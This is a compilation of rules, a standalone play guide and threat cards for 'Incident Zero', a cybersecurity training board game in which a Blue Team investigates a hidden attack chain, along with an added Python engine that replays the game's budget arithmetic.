INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
→ 1st success vs. link 3: clue about bulk data leaving the database.
Turn 7: START → -10 (20).
DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
→ ✓ DATABASE EXFILTRATION REVEALED — final card!
Victory is checked IMMEDIATELY (before any start-of-turn penalties).
WIN on the final turn with 5 Budget remaining.
(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)
Blue Team wins Incident Response if:
1. ALL threat cards in the attack chain are revealed (face-up on table), AND
2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.

Blue Team loses Incident Response if:
1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR
2. The team cannot take any legal action (see Budget Edge Rules below)

Losing Scenarios:
- Turns expired with only 2 of 4 cards revealed = attack succeeded
- Budget too low to afford any action = response ran out of resources
If you want to measure quality of victory:
Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50
Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0 × 50) = 25/100 (Defeat)
When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:
Important: Choose only ONE reward per card reveal. Cannot combine rewards.
Every game should conclude with guided reflection connecting game mechanics to real security concepts.
Discuss whether they targeted the right logs/evidence first
"Which action type was most effective for you—Investigate or Deploy Defense?"
Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)
"How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"
Were they realistic representations of incident response and dwell-time costs?
"If you replayed, what would you do differently?"
Discuss investigation approaches that didn't work
"Would you have benefited from more defense deployments vs. investigations?"
Discuss risk/reward trade-offs
"How would you investigate differently if you could replay?"
Strategic adjustments for next attempt
"What was the attacker's complete kill chain?"
Discuss which card took longest to detect and why
"Why isn't this easy to detect in real-world networks?"
Detection requires specific telemetry (EDR, SIEM, network monitoring)
"What tool or process would have helped you detect faster?"
User and Entity Behavior Analytics (UEBA)
"How does game dwell time compare to real breaches?"
Poor clue (too vague, gives nothing away):
- "You find something suspicious"
- "There's a threat somewhere"

Bad clue (gives it away completely):
- "The attacker used Mimikatz to dump credentials from LSASS memory"
- "You have a database exfiltration happening right now"

Good clue (progressive disclosure, dramatic delivery):
- "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Excellent clue (specific without revealing, creates narrative):
- "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."

The game is TOO EASY if:
- Team reveals all cards in the first half of the turn limit with 60+ Budget remaining
- Multiple consecutive successful rolls (unlikely with d20)
- Clues are too specific/obvious
- Team makes no difficult decisions

Action: Make clues more subtle, reduce starting budget next time, or add extra card to chain

The game is TOO HARD if:
- Team gets stuck after revealing only 1 card (4+ turns with no progress)
- Multiple consecutive failed rolls
- Team is frustrated rather than challenged
- Team is out of ideas about what to investigate

Action: Provide more explicit clues, increase starting budget, reduce chain length

Adjustment Options:
- Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1
- Clue Quality: More specific/obvious (easier) vs. subtle (harder)
- Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier)
- Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)
If running for tournament or competitive context:
Attack Chain:
1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE)
3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

Starting Budget: 100
Turn Limit: 7 [(3 × 2) + 1]
Narrative Setup:
"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."
Focus: Teaching full kill chain detection (initial → credential harvesting → data theft)
Expected Duration: 30 minutes
Best For: First-time players, classroom introduction

Sample Defenses in Starting Hand:
- D-01: Email Authentication Setup (BASIC, 10)
- D-02: User Security Training (BASIC, 10)
- D-07: Multi-Factor Authentication (ADVANCED, 15)
- D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
- D-11: Data Loss Prevention (ADVANCED, 15)
Attack Chain:
1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT)
2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE)
4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)

Starting Budget: 100
Turn Limit: 9 [(4 × 2) + 1]
Narrative Setup:
"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."
Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts
Expected Duration: 40 minutes
Best For: Experienced players, demonstrating complex kill chain

Sample Defenses:
- D-18: Intrusion Prevention System (IPS) (ADVANCED, 15)
- D-09: Network Segmentation (ADVANCED, 15)
- D-04: Network Firewall Rules (BASIC, 10)
- D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
- D-13: Threat Hunting Program (ELITE, 25)
- D-14: Memory Forensics (ELITE, 25)
Attack Chain:
1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE)
2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE)
4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)
5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)

Starting Budget: 100
Turn Limit: 11 [(5 × 2) + 1]
Narrative Setup:
"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"
Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure
Expected Duration: 45 minutes
Best For: Advanced players, demonstrating supply chain risk

Sample Defenses:
- D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment
- D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15)
- D-09: Network Segmentation (ADVANCED, 15)
- D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit
- D-14: Memory Forensics (ELITE, 25)
- D-19: Backup & Disaster Recovery (BASIC, 10)
- D-11: Data Loss Prevention (ADVANCED, 15)
How to Play Solo:
- Single player acts as both Blue Team AND Threat Orchestrator
- Orchestrator creates attack chain before game starts
- Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards)
- Requires discipline: don't use knowledge of chain to guide rolls
Best For: Individual learning, skill practice
Compress the Game:
- Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7)
- Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping)
- Budget costs stay the same
- Budget starts at 120 to balance speed pressure
Best For: Experienced teams wanting high-stakes challenge
Deeper Forensics:
- Add "Advanced Investigate" action (costs 15 Budget, rolls 11+)
- A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2)
- Allows for riskier but more rewarding investigation strategy
Best For: Players who want forensic investigation to feel more rewarding
Multiple Teams, Same Challenge:
1. All teams receive the same 4-card attack chain
2. All teams start with same 100 Budget, same 5 Defense Cards drawn
3. Teams play simultaneously (or in sequence) against same scenario
4. Scoring: Cards revealed + Budget remaining = final score
5. Tiebreaker: Fewest turns taken
Best For: Classroom competition, conference play, benchmarking
Option 1: Continue to Hardening Module
- Excellent choice if building defenses against discovered threats
- Use the attack chain you just discovered as the hardening context
- Natural progression: detect the attack → now prevent it

Option 2: Continue to Audit & Compliance Module
- Great for understanding how to detect this attack chain
- Validates that your detection methods work
- Audits your existing security controls

Option 1: Continue to Disaster Recovery Module
- Appropriate: assume the attack succeeded
- Manage the breach that just happened
- Focus on response, stakeholder communication, recovery

Option 2: Replay with Different Strategy
- Try again with different investigation/defense approach
- Use what you learned to optimize for next attempt

Option 3: Study Real Breach Case Studies
- Compare your experience to real breaches (Equifax, Target, SolarWinds)
- Understand why real dwell times are 200+ days
- Learn what signals real defenders look for

Play Again with:
- Different attack chain from the card deck
- Different difficulty (if you won easily or struggled)
- Competitive mode against other teams
- Extended variations with different mechanics
| Action | Cost | Roll Required | Success Condition | Failure Condition |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: card revealed (v2.2) | No intel gained |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 Budget (v2.2) | None | Threat removed, penalty stops | — |

| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence" |
| +1 | Real security tools/techniques | "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link |
| +0 | Vague/no justification | "Find suspicious activity" |

| Tracker | Starts At | Changes |
|---|---|---|
| Budget | 100 | -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when card revealed, -1 when auto-mitigated or Emergency Response used |
Changes for playtesters to validate, and why they were made:
Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.
Incident Response Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/standalone-games/incident-response.md
Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Incident response training, attack detection practice, SOC operations
The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.
This is the foundation module—many other modules build upon successful or unsuccessful incident response.
Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.
| Difficulty | Chain Length | Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |
Create the Attack Chain:
1. Select 3-5 threat cards in logical sequence
2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL
3. Write down clues for each hidden card (don't reveal yet)
4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md
Recommended first-time scenario:
- T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING)
- T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK)
- T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
- Total: 3 cards, ~30 minutes, teaches full attack chain concept

The Threat Orchestrator reads an opening scenario based only on the first hidden card's clue. Example:
"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."
Each turn follows this structure:
1. START OF TURN
   - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget
   - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free)
   - Read turn number aloud ("Turn 3...")

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Team discusses strategy
   - Decides on ONE action (see below)
   - Announces action and parameters

3. ACTION RESOLUTION
   - Roll 1d20 for success/failure
   - Apply modifiers (see below)
   - Determine outcome

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 Defense Card
   - Check if game won/lost
Cost: 5 Budget
Roll Required: 11+ (on d20)

How it works:
1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs")
2. Provide technical justification for the investigation approach
3. Roll 1d20

Roll Modifiers:
- +2 bonus: Strong technical justification (references specific logs, tools, or methodologies)
- +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK)
- No modifier (+0): Vague investigation

Examples of good justification:
- "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds"
- "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"

Outcomes (v2.2 — investigation successes accumulate):
- Success (roll + modifiers ≥ 11):
  - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below)
  - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward
- Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.
Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.
Cost: 10/15/25 Budget (depending on card tier)
Roll Required: 11+ (on d20)

How it works:
1. Choose a Defense Card from your hand
2. Target a specific Asset or threat vector
3. Explain why this defense is appropriate for the situation
4. Roll 1d20

Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)

Outcomes:
- Success (roll + modifiers ≥ 11):
  - If card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY!
  - If it matches but wrong step, or right step but wrong vector → Defense deployed but no reveal
  - If neither matches → Defense deployed but ineffective against current threat
Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.
Cost: 15 Budget (v2.2 — repriced from 25)
Roll Required: None—this always succeeds

How it works:
1. Choose a previously revealed Threat Card still in play
2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.)
3. Card is immediately removed from play
4. Uncontained Threats penalty decreases by 1

Strategic Use:
- Use this if you're running out of budget and accumulating penalties
- Use this if a threat is too dangerous to leave active
- Use this to prepare for later modules (e.g., if continuing to Hardening, fewer uncontained threats = more budget available)

How it works:
1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker)
2. At the START of each turn, deduct 5 Budget per uncontained threat
3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too)
4. When Emergency Response is used, remove that threat and decrement the tracker
5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)
Example (one action per turn; 3-card chain; Budget 100):
Turn 1: START → -5 Active Breach Cost (95)
Deploy Defense succeeds, full match → PHISHING REVEALED
(-10 for the BASIC defense, 85) → Uncontained Threats = 1
Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
...investigation continues toward the next chain card
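The Emergency Response trace just above and the 7-turn worked example in the module rules exercise the same v2.2 bookkeeping, so here is an added Python replay engine, not part of the Incident Zero rules or the project's own code, that encodes the start-of-turn costs, accumulated Investigate successes, full-match reveals, auto-mitigation, Emergency Response, Deployed Defense Persistence and the Victory Points formula, and replays both traces. Method names, the script format and the assumption that Budget Grant is the Discovery Reward taken are mine.

```python
# Added example, not part of the Incident Zero rules or project code: a replay engine for v2.2 Incident Response bookkeeping.
from dataclasses import dataclass, field
DEFENSE_COST = {"BASIC": 10, "ADVANCED": 15, "ELITE": 25}
INVESTIGATE_COST = 5
EMERGENCY_COST = 15        # flat price, repriced from 25 in v2.2
UNCONTAINED_PENALTY = 5    # per uncontained threat, at the start of a turn
ACTIVE_BREACH_COST = 5     # while any chain card is hidden, at the start of a turn
BUDGET_GRANT = 10          # the Discovery Reward both page traces choose (assumption)
SUCCESS_THRESHOLD = 11     # roll + modifiers >= 11 succeeds

def check_roll(roll, justification=False, tools=False, persistence=False):
    # Modifier table: +2 strong justification, +1 real tools, +2 Deployed Defense Persistence
    return roll + 2 * justification + tools + 2 * persistence >= SUCCESS_THRESHOLD

def victory_points(revealed, total, budget, starting_budget=100):
    # Points = (Cards Revealed / Total) x 50 + (Budget Remaining / Starting Budget) x 50
    return revealed * 50 / total + budget * 50 / starting_budget

@dataclass
class IncidentResponse:
    chain: list                 # [(threat name, attack vector), ...] in kill-chain order
    budget: int = 100
    turn: int = 1
    revealed: int = 0           # chain cards face-up
    uncontained: int = 0        # Uncontained Threats Tracker
    link_successes: int = 0     # accumulated Investigate successes on the current link
    deployed_vectors: list = field(default_factory=list)   # Deployed Defense Persistence
    trail: list = field(default_factory=list)              # Budget after every change

    def won(self):
        return self.revealed == len(self.chain)  # checked immediately on the final reveal

    def persistence_applies(self):
        # sequential discovery: the target is always the earliest unrevealed card
        return not self.won() and self.chain[self.revealed][1] in self.deployed_vectors

    def _spend(self, amount):
        self.budget = max(0, self.budget - amount)   # Budget floors at 0
        self.trail.append(self.budget)

    def start_turn(self):
        if self.turn > len(self.chain) * 2 + 1:  # turn limit, Core Rules section 3a
            raise RuntimeError("turn limit exceeded with cards still hidden")
        cost = UNCONTAINED_PENALTY * self.uncontained
        if not self.won():
            cost += ACTIVE_BREACH_COST           # dwell time is never free
        self._spend(cost)

    def _reveal(self):
        if self.uncontained > 0:
            self.uncontained -= 1                # auto-mitigation of the previous threat
        self.revealed += 1
        self.uncontained += 1                    # the newly revealed card is uncontained
        self.link_successes = 0                  # successes do not carry over to the next link

    def investigate(self, success):
        self._spend(INVESTIGATE_COST)            # spent whether or not the roll succeeds
        if success:
            self.link_successes += 1
            if self.link_successes == 2:         # second success on the same link reveals it
                self._reveal()

    def deploy_defense(self, tier, vector, success):
        self._spend(DEFENSE_COST[tier])
        if success:                              # a failed roll discards the card, budget spent
            self.deployed_vectors.append(vector)  # deployed defenses stay on the board
            if vector == self.chain[self.revealed][1]:   # FULL MATCH: reveal immediately
                self._reveal()

    def emergency_response(self):
        self._spend(EMERGENCY_COST)              # no roll: always succeeds
        self.uncontained -= 1                    # assumes a revealed, uncontained threat exists

    def budget_grant(self):
        self.budget += BUDGET_GRANT              # Discovery Reward chosen after a reveal
        self.trail.append(self.budget)

CHAIN = [("Phishing Campaign", "SOCIAL ENGINEERING"), ("Lateral Movement via SMB", "NETWORK"),
         ("SQL Database Exfiltration", "DATA EXFIL")]          # beginner chain used by both traces
MODULE_EXAMPLE = [                               # the 7-turn investigation-led run
    [("investigate", True)],                     # T1: first clue on link 1
    [("investigate", True), ("budget_grant",)],  # T2: Phishing revealed, +10
    [("investigate", True)],                     # T3: first clue on link 2
    [("deploy_defense", "ADVANCED", "NETWORK", True), ("budget_grant",)],   # T4: full match
    [("investigate", False)],                    # T5: failed roll, budget still spent
    [("investigate", True)],                     # T6: first clue on link 3
    [("deploy_defense", "ADVANCED", "DATA EXFIL", True)]]                   # T7: final reveal
STANDALONE_EXAMPLE = [[("deploy_defense", "BASIC", "SOCIAL ENGINEERING", True), ("budget_grant",)],
                      [("emergency_response",)], []]   # the Emergency Response trace; T3 pays start-of-turn cost only

def replay(script, chain=CHAIN):
    game = IncidentResponse(list(chain))         # one action (plus optional reward) per turn
    for turn_actions in script:
        game.start_turn()
        for name, *args in turn_actions:
            getattr(game, name)(*args)
        if game.won():
            break                                # victory beats the next turn's penalties
        game.turn += 1
    return game
```

`replay(MODULE_EXAMPLE).trail` reproduces the module's arithmetic check step by step and ends at 5 Budget on turn 7; `replay(STANDALONE_EXAMPLE).trail` gives 95, 85, 95, 85, 70, 65.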
Blue Team Wins if:
- All threat cards in the attack chain are revealed
- AND this happens within your turn limit (7/9/11 by chain length)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.

Blue Team Loses if:
- Turn Tracker exceeds your turn limit with unrevealed cards remaining
- OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)
If you want to score:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50
Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)
When your team successfully reveals a Threat Card:
Choose ONE reward:
FOR WINNERS:
1. "What was your investigation strategy? What worked?"
2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?"
3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"

FOR LOSERS:
1. "What went wrong in your investigation? Where did you get stuck?"
2. "Would you have benefited from more defense deployments vs. investigations?"
3. "How would you investigate differently if you could replay?"

EVERYONE:
1. "What was the attacker's complete kill chain?"
2. "Which threat card was hardest to detect? Why?"
3. "Why isn't this easy to detect in real-world networks?"
4. "What tool or process would have helped you detect faster?"

Poor clue (too vague):
- "You find something suspicious"

Too good (gives it away):
- "The attacker used Mimikatz to dump credentials from LSASS memory"

Just right (progressive disclosure):
- "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

The game is too easy if:
- Teams reveal all cards in turns 1-4 with budget to spare
- Clues are too specific
- Teams succeed on every roll

The game is too hard if:
- Teams get stuck after revealing 1 card
- No successful rolls for 5+ turns
- Teams hit the turn limit with only 1-2 cards revealed

Adjust by:
- Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1)
- Quality of clues (more/less specific)
- Starting budget (60 vs. 100 vs. 120)
- Turn limit (formula −1 for harder, formula +1 for easier)

If running this for a tournament or competitive context:
- Assign different attack chains to each team (or same chain for scoring comparison)
- Teams cannot see each other's progress
- First team to reveal all cards wins
- Tiebreaker: Most Budget remaining
Focus: Teaching full kill chain detection in 30 minutes
Focus: Sophisticated attack with multiple detection points
Focus: Complex supply-chain-initiated attack chain
If you won:
- Continue to Hardening Module → Build defenses against discovered threats
- Continue to Audit & Compliance Module → Verify your detection methods

If you lost:
- Continue to Disaster Recovery Module → Manage the breach that succeeded
- Replay with a different strategy
- Try a different scenario
Standalone: Play again with a different attack chain
| Action | Cost | Roll | Success | Failure |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: reveal (v2.2) | No intel (budget wasted) |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 (v2.2) | None | Remove revealed threat | — |

| Modifier | Effect |
|---|---|
| +2 | Strong technical justification |
| +1 | Real tool/technique referenced |
| +2 | Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2) |

| Tracker | Starting | Changes |
|---|---|---|
| Budget | 100 | -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when revealed, -1 when contained or next card revealed |
For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.
Incident Response Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game
cards/incident-response/core-deck/threat-defense-cards.md
Steps:
- INITIAL COMPROMISE - First entry point
- PIVOT & ESCALATE - Movement and privilege escalation
- PERSISTENCE - Maintaining access
- C2 & EXFIL - Command & control and data theft

Vectors: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, DATA EXFIL

┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your security team reports that │
│ several employees have received │
│ emails claiming to be from your │
│ IT department requesting password │
│ resets. One user has already │
│ clicked the link. Email headers │
│ show the domain is spoofed." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Phishing exploits human psychology │
│ rather than technical vulnerabilities.│
│ Attackers use social engineering to │
│ create urgency and bypass technical │
│ controls. With email authentication │
│ (DMARC/SPF) and user training, this │
│ attack is highly preventable. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: WEB EXPLOIT │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "A popular industry blog your │
│ employees frequently visit has │
│ been compromised. Logs show that │
│ your users' browsers were │
│ redirected to a malicious domain │
│ hosting an exploit kit targeting │
│ unpatched browsers." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Watering hole attacks target │
│ trusted third-party sites to infect │
│ specific user groups. They bypass │
│ email filters and exploit browser │
│ vulnerabilities. Defense requires │
│ rapid patching and endpoint │
│ monitoring. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your SIEM has detected a │
│ successful VPN login from an │
│ unusual geographic location at │
│ 3 AM. The username belongs to an │
│ employee who is currently on │
│ vacation. The login attempt came │
│ from an IP in a known cybercrime │
│ hosting provider." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Credential stuffing uses passwords │
│ leaked from third-party breaches. │
│ If employees reuse passwords, their │
│ work accounts become compromised. │
│ Multi-factor authentication (MFA) │
│ is the primary defense. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Network segmentation alerts show │
│ unusual SMB traffic between a │
│ compromised workstation and your │
│ file server. Suspicious named pipe │
│ activity detected. The attacker │
│ appears to be enumerating shares │
│ and attempting to access restricted │
│ resources." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ SMB (Server Message Block) is a │
│ legitimate protocol, so traffic │
│ blends in. Flat network architecture│
│ allows attackers to move freely. │
│ Without micro-segmentation and │
│ strong authentication, lateral │
│ movement is easy. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept │
│ exploit for an unpatched local │
│ privilege escalation vulnerability │
│ in the Windows kernel. Seconds │
│ later, the same process spawned a │
│ child running as SYSTEM. Patch │
│ reports show this host is three │
│ months behind on kernel updates." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Kernel exploits abuse memory- │
│ corruption or logic flaws (think │
│ Dirty Pipe or win32k CVEs) to jump │
│ from a standard user to SYSTEM or │
│ root. Public PoC code often appears │
│ within days of disclosure, so │
│ unpatched hosts are easy targets. │
│ Rapid patching, EDR behavioral │
│ detection, and least privilege │
│ limit the damage. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Memory forensics analysis on the │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool │
│ has dumped credential hashes from │
│ memory. Several cached domain admin │
│ credentials have been extracted. │
│ The attacker now has credentials │
│ to move to critical systems." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Mimikatz attacks Windows LSASS │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials. │
│ Without proper Credential Guard and │
│ memory protection, domain admin │
│ credentials become compromised, │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE │
├─────────────────────────────────────┤
│ Step: PERSISTENCE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Log analysis shows a scheduled │
│ task created by the compromised │
│ account. The task is set to execute │
